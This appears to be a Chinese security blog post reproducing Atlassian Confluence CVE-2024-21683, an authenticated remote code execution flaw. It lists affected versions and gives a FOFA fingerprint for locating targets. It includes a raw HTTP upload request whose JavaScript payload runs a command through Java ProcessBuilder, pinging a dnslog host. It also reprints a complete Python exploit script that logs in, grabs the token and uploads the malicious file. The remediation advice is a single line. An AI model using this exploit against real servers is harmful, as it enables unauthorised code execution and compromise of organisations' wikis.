|
|
现在只对常读和星标的公众号才展示大图推送,建议大家把阿无安全“设为星标”,否则可能看不到了!
0x01 前言
0x02 漏洞影响
影响版本
ConfluenceDataCenter =8.9.08.8.0<= ConfluenceDataCenter <=8.8.18.7.1<= ConfluenceDataCenter <=8.7.28.6.0<= ConfluenceDataCenter <=8.6.28.5.0<= ConfluenceDataCenter and Server <=8.5.8(LTS)8.4.0<= ConfluenceDataCenter and Server <=8.4.58.3.0<= ConfluenceDataCenter and Server <=8.3.48.2.0<= ConfluenceDataCenter and Server <=8.2.48.1.0<= ConfluenceDataCenter and Server <=8.1.48.0.0<= ConfluenceDataCenter and Server <=8.0.47.20.0<= ConfluenceDataCenter and Server <=7.20.37.19.0<= ConfluenceDataCenter and Server <=7.19.21(LTS)7.18.0<= ConfluenceDataCenter and Server <=7.18.37.17.0<= ConfluenceDataCenter and Server <=7.17.5
0x03 漏洞利用
刚刚好,吃屎的运气~ 关注了好久的终于爆出漏洞了~~
FOFA指纹:icon_hash="-305179312"界面是这个酱紫
当然是有前提条件,需要有个账号:
其他数据包就不放了,执行github上的脚本命令会直接挂到burp就能看到
POST/admin/plugins/newcode/addlanguage.actionHTTP/2Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveContent-Length: 372Content-Type: multipart/form-data; boundary=f6dae662e22371daece5ff851b1c4a39--f6dae662e22371daece5ff851b1c4a39Content-Disposition: form-data; name="newLanguageName"test--f6dae662e22371daece5ff851b1c4a39Content-Disposition: form-data; name="languageFile"; filename="exploit.js"Content-Type: text/javascriptnew java.lang.ProcessBuilder["(java.lang.String[])"](["ping 5hnlyo.dnslog.cn"]).start()--f6dae662e22371daece5ff851b1c4a39--
EXP如下:(这里利用github写好的脚本)
importargparseimportosimportrequestsfrombs4importBeautifulSoupdefGeyAltToken(url, proxy, session):headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"}alttoken_url =f"{url}/admin/plugins/newcode/configure.action"resp = session.get(url=alttoken_url, headers=headers, verify=False, proxies=proxy, timeout=20)if"atlassian-token"inresp.text:soup = BeautifulSoup(resp.text,'html.parser')meta_tag = soup.find('meta', {'id':'atlassian-token','name':'atlassian-token'})ifmeta_tag:content_value = meta_tag.get('content')returncontent_valueelse:print("Meta tag not found")defLoginAsAdministrator(session, url, proxy, username, password):login_url = url +"/dologin.action"headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36","Content-Type":"application/x-www-form-urlencoded"}data =f"os_username={username}&os_password={password}&login=%E7%99%BB%E5%BD%95&os_destination=%2F"session.post(url=login_url, headers=headers, data=data, proxies=proxy, verify=False, timeout=20)defDoAuthenticate(session, url, proxy, password, alt_token):login_url = url +"/doauthenticate.action"headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36","Content-Type":"application/x-www-form-urlencoded"}data =f"atl_token={alt_token}&password={password}&authenticate=%E7%A1%AE%E8%AE%A4&destination=/admin/viewgeneralconfig.action"session.post(url=login_url, headers=headers, data=data, proxies=proxy, verify=False, timeout=20)defUploadEvilJsFile(session, url, proxy, jsFilename, jsFileContent, alt_token):url =f"{url}/admin/plugins/newcode/addlanguage.action"data = {"atl_token": alt_token,"newLanguageName":"test"}files = {"languageFile": (jsFilename, jsFileContent,"text/javascript")}headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"}session.post(url, headers=headers, data=data, files=files, verify=False, proxies=proxy, timeout=20)defParseArgs():parser = argparse.ArgumentParser(description="CVE-2024-21683-RCE")parser.add_argument("-u","--url", type=str, help="target url to check, eg: http://192.168.198.1:8090", required=True)parser.add_argument("-p","--proxy", type=str, default="http://127.0.0.1:8083", help="proxy url, eg: http://127.0.0.1:8083", required=False)parser.add_argument("-au","--admin-username", type=str, help="The username of the user who is in the Administrators group", required=True)parser.add_argument("-ap","--admin-password", type=str, help="The password of the user who is in the Administrators group", required=True)parser.add_argument("-f","--file", type=str, help="exploit file", default="exploit.js", required=True)parser.add_argument("-n","--name", type=str, help="newLanguageName", default="test", required=True)returnparser.parse_args()if__name__ =='__main__':args = ParseArgs()ifnotargs.proxy:proxy = {}else:proxy = {"http": args.proxy,"https": args.proxy}session = requests.session()jsfn = os.path.basename(args.file)jsfc = open(args.file,"r", encoding="utf-8").read()LoginAsAdministrator(session, args.url.strip("/"), proxy, args.admin_username, args.admin_password)alt_token = GeyAltToken(args.url.strip("/"), proxy, session)DoAuthenticate(session, args.url.strip("/"), proxy, args.admin_username, alt_token)UploadEvilJsFile(session, args.url.strip("/"), proxy, jsfn, jsfc, alt_token)
详情可以去github看
https://github.com/W01fh4cker/CVE-2024-21683-RCEhttps://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated
0x04 修复方案
请升级最新版本。 原文始发于微信公众号(阿无安全):狗屎运~Atlassian Confluence CVE-2024-21683 RCE漏洞复现(附EXP)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论